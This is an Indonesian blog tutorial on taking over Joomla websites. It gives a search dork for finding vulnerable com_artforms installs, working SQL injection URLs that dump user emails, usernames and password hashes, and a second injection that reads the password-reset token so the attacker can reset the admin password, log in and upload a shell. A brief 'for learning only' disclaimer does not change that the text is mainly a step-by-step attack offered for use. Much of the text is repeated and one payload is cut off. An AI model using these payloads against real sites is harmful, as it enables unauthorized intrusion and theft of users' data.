Exploit Joomla Dengan Token dan Reset Password
Assalamualaikum wr-wb , ketemu lagi bersama saya sang lelaki ganteng :v wkwkw becanda ! dalam tutorial exploit joomla dengan token dan reset password , di jelaskan bagaimana cara exploit web joomla , tanpa crack hash nya melainkan dengan akses token dan reset pass , langsung saja
sediakan web yang vuln, agan bisa mencari dengan DORK , atau agan bisa scan dengan UNISCAN ,
dalam contoh ini ane menggunakan dork
inurl:"option com_artforms"
ane anggap agan sudah mendapatkan target ,
http://www.site.com/index.php?option=com_artforms&Itemid=73
lalu agan tambahin
/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,us
ername,0x3a,password)+from+jos_users--
pada web joomla tersebut , sehingga muncul
ok , tahap ini berhasil ! berarti web tersebut vuln dan kita akan masuk ke tahap berikutnya .
selanjutnya adalah tahap reset password rubah sehingga menjadi
http://www.site.com/index.php?option=com_user&view=reset
dan muncul seperti gambar di bawah ! dan agan masukan email website tersebut
setelah itu muncul form token seperti gambar di bawah
nah , dari mana token bisa kita ketahui ? token akan tersimpan di data base , dan kita bisa melihatna dengan memasukan kode ini pada url website tersebut
/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a
,activation)+from+jos_users
upload shell agan deh ;) atau file upload tersembunyi . sekian dari ane , mohon kritik dan sarannya ;)
saran ane , jangan ngerusak web orang lain ! ngak baik n dosa , hanya buat pembelajaran ;)
sediakan web yang vuln, agan bisa mencari dengan DORK , atau agan bisa scan dengan UNISCAN ,
dalam contoh ini ane menggunakan dork
inurl:"option com_artforms"
ane anggap agan sudah mendapatkan target ,
http://www.site.com/index.php?option=com_artforms&Itemid=73
lalu agan tambahin
/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,us
ername,0x3a,password)+from+jos_users--
pada web joomla tersebut , sehingga muncul
ok , tahap ini berhasil ! berarti web tersebut vuln dan kita akan masuk ke tahap berikutnya .
selanjutnya adalah tahap reset password rubah sehingga menjadi
http://www.site.com/index.php?option=com_user&view=reset
dan muncul seperti gambar di bawah ! dan agan masukan email website tersebut
setelah itu muncul form token seperti gambar di bawah
nah , dari mana token bisa kita ketahui ? token akan tersimpan di data base , dan kita bisa melihatna dengan memasukan kode ini pada url website tersebut
/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a
setelah itu akan muncul form reset pass baru , tapi kadang cara ini ngak bisa , kalau agan mendapatkan token dengan tanda :$ sekian2 agan tidak bisa mereset pass nya , cari ajah yg lain ;)
nah kemudian kita masuk deh di admin loginnya , biasa nya site.com/administrator dan
saran ane , jangan ngerusak web orang lain ! ngak baik n dosa , hanya buat pembelajaran ;)
No comments:
Post a Comment